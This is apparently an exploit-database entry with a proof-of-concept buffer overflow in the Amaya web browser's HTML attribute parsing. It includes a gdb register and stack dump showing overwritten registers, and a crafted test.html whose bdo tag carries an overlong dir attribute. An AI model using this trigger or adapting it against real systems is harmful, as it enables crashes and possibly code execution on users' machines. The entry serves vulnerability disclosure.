Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC

=================================================================
Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC
=================================================================




Amaya Web Browser html tag overflow (quite a few tags are vulnerable)

(gdb) i r
eax            0x41414141    1094795585
ecx            0x0    0
edx            0xbfc0ff80    -1077870720
ebx            0x9ec1220    166466080
esp            0xbfc10064    0xbfc10064
ebp            0xbfc10268    0xbfc10268
esi            0xa2f64a0    170878112
edi            0xbfc10160    -1077870240
eip            0x8144b40    0x8144b40 <EndOfHTMLAttributeValue(char*, _AttributeMapping*, int*, int*, bool, _ParserData*, bool)+2352>
eflags         0x10246    [ PF ZF IF RF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb) x/10x $ebp
0xbfc10268:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfc10278:    0x41414141    0x41414141    0x41414141    0x41414141
0xbfc10288:    0x41414141    0x41414141


#cat test.html
<bdo dir="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" >webDEViL</bdo>



#  0day.today [2018-01-04]  #